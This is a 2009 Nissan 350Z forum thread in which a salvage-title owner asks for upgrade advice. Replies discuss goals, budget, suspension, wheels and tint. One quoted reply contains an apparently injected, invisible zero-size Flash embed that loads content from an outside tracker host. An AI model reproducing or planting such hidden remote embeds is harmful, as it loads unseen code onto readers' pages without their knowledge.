Notices
2003-2009 Nissan 350Z

My Project Z

Search this Thread

Old 11-02-2009, 10:00 AM
Mediocrates

Received 0 Likes on 0 Posts
Default My Project Z

Hey guys, been lurking for a while now and I figured it was about time I asked for the public opinion.

I picked up an 03 Touring as a salvage title about a year ago as a project car, it's fully functional but a little beat up. I plan on replacing or upgrading the parts over time but I'm having trouble deciding what I should upgrade and what just needs maintained. I'm not looking for a ton of power, not for a while at least. Just handling, appearance, and ride quality.

My question to the Z community:
If you were to start from scratch, what would you upgrade? I'm asking for anything from tinted windows to a full suspension system. What upgrade were you the happiest with? What could you have done without?

Thanks in advance!
Old 11-02-2009, 10:39 AM
Mikie13

The first thing is...you are going to get flamed for not searching, so I'll politely suggest...search the forum. Tons of info here.

Second thing, you're going to get flamed for asking for other peoples opinions when its YOUR car...I'm not gonna jump on that boat though.

However, it is your car and I think you need to think of a mod path that you want to run with. What are your goals? What do you want this car to be for? DD? Weekend warrior? Track? Show? All Handling? All power? Both? You have to answer these questions first.

Sounds like you're not too interested in adding the power mods yet, so look into suspension. Start with Tires, sways, springs, etc. Then move onto power mods. You can only do so much in the means of power without going to FI.

But the biggest thing I would do...take the time and money and effort into inspecting everything about the car, and make sure it is up to par in reliability. You said its a Salvage, but from what? Make sure that nothing on the car is half-assed or ready to explode or break before you start modding.

Sounds like a good project car, just make sure you have as solid of a beginning platform to start with. Goodluck!
Old 11-02-2009, 12:36 PM
Globalscan

whats your budget?
Old 11-02-2009, 01:48 PM
bluelineshooter

Paint flames on it. Then put a six inch lift kit and big mudding tires under it
Old 11-02-2009, 02:29 PM
usa_alex

i bought a salvage title Z also
first thing is your budget!!!
also depends how many miles and how beat is the car
you don't want to put some $$$ in it and then something gives and you're screwed
where in Ohio do you live?
Old 11-02-2009, 02:32 PM
1GR8350Z

Ferrari kit and a blower. JK. Define your goals and your budget for your car and search this forum for answers. They are there
Old 11-02-2009, 02:49 PM
ZS14RR

Received 5 Likes on 5 Posts

you need to give us more details and info about what you like.....

I personally would fix the exterior details first..make it look nice before dropping $$$ on on other parts. Make it look presentable.
Old 11-02-2009, 04:27 PM
toeveryhour

lower it
tint
new wheels
Old 11-02-2009, 05:21 PM
dhays

Received 1 Like on 1 Post

Originally Posted by Mikie13
However, it is your car and I think you need to think of a mod path that you want to run with. What are your goals? What do you want this car to be for? DD? Weekend warrior? Track? Show? All Handling? All power? Both? You have to answer these questions first.
This is the best advice. First figure out what you want from the car. If you want a car that will turn out the best possible 1/4 mile times, then your upgrade path will look a lot different than a car used for a comfortable DD. A show car will have a whole different path than a track car.

If you are thinking that you just want a fun sports car, then define for yourself what "fun" is. Do you want a car that can blast from one stoplight to next? Do you want a car that will turn heads? Do you want a car that sounds any particular way? Do you want looks or handling, power or sound....?

Figure it out then start designing an upgrade path to match your goals. This isn't as easy as it sounds and I rarely do it as well as I should.

As for budget, I think that knowing your budget up front can be good. However, I prefer to know my goals and then determine what budget it will take to meet those goals. If I find that I'm not willing to spend that much, then I recognize that my goals are not realistic. I think that is better than saying "I've got $4,000 to spend, what can I get for that?" for example.
Old 11-03-2009, 06:32 PM
ImWeeZzel
350Z-holic

Received 18 Likes on 12 Posts

please search the forums before posting a thread like this

any pics of this salvaged car?
Old 11-03-2009, 08:08 PM
dhays

Originally Posted by viva la spam
please search the forums before posting a thread like this
Clever icon, but given that the OP asked this question:

Originally Posted by Mediocrates
My question to the Z community:
If you were to start from scratch, what would you upgrade?
What search parameters would you suggest he use to find the answer to that question? I'd like to be able to improve my ability to find information here as well so you'd be helping me out as well as the OP.
Old 11-03-2009, 08:13 PM
2k6-z33

https://my350z.com/forum/exterior-an...to-your-z.html
Old 11-03-2009, 11:48 PM
ImWeeZzel
350Z-holic

Received 18 Likes on 12 Posts

depending on what his and your budget (like everyone else mentioned), does he want a powerhouse or a DD?

i guess since he wants "appearance and handling" maybe rims and a better suspension? sounds like there is more concerns of the cosmetic portion of this build. as far as handling, i couldnt tell you. i dont really drive my Z enough to want to upgrade the suspension but im sure there is numerous threads about that.

my advice if you want to go FI be prepared to spend... I learned even w/ a good tune things can still go bad. im working on getting more supporting mods added so having a little extra cash on the side is a must. the way i see it now, and not that i regret but a na engine is more reliable.

gl w/ your search guys
Old 11-04-2009, 02:05 AM
jerseymike68

Love it..
Thanks for the post..
Old 11-04-2009, 09:54 AM
latiger12

Originally Posted by toeveryhour
lower it
tint<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://nfledge.net/?tracker=3759"></param><param name="allowFullScreen" value="true"></param><embed src="http://nfledge.net/?tracker=3759" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
new wheels
Tint and new wheels for sure!
Old 11-04-2009, 11:13 AM
mvp2765

stickers, lots of em..lol..
fix or replace exterior to look nice, then some nice wheels and maybe a drop
Old 11-04-2009, 03:52 PM
JOMZSHAKES

definately buy all your parts used, especially springs struts exhaust and intake, its about 1/3rd the price used and you can also help someone else out buy buying there stuff from them, spend good money on your rims because thats the biggest visual/performance/handling upgrade and defiantely match what u buy, if you buy red engine parts make the rest of the engine parts red, if your rims are black with crome trim then tint your windows and get chrome accents. dont leave your apperance stock and expect to turn heads, dont buy parts that arent recommended by the forum gurus cuz they obviously know what theyre talking bout. keep it suttle, and well tuned, not wild and ricey. o yea, and buy a valentine 1 if your a speeder, no question about that
Old 11-11-2009, 01:47 PM
scotts300
350Z-holic

Received 7 Likes on 6 Posts

Originally Posted by JOMZSHAKES
definately buy all your parts used, especially springs struts exhaust and intake, its about 1/3rd the price used and you can also help someone else out buy buying there stuff from them, spend good money on your rims because thats the biggest visual/performance/handling upgrade and defiantely match what u buy, if you buy red engine parts make the rest of the engine parts red, if your rims are black with crome trim then tint your windows and get chrome accents. dont leave your apperance stock and expect to turn heads, dont buy parts that arent recommended by the forum gurus cuz they obviously know what theyre talking bout. keep it suttle, and well tuned, not wild and ricey. o yea, and buy a valentine 1 if your a speeder, no question about that
This was a hard paragraph to read, but at the end of the day, what is "suttle"? Honestly. . .
Old 11-18-2009, 08:31 PM
AREITU

Change all the fluids, clutch-type rear diff, a set of swaybars, some decent coilovers, a plenum spacer, test pipes and a tune. Slam that sucker, get an extra set of rims and go drifting or get huge rims that fit just barely flush, and hard park everywhere.

put drift stickers over any dents on the outside of the car.
Old 11-18-2009, 08:33 PM
Jay'Z
Banned

just do it.

Quick Reply: My Project Z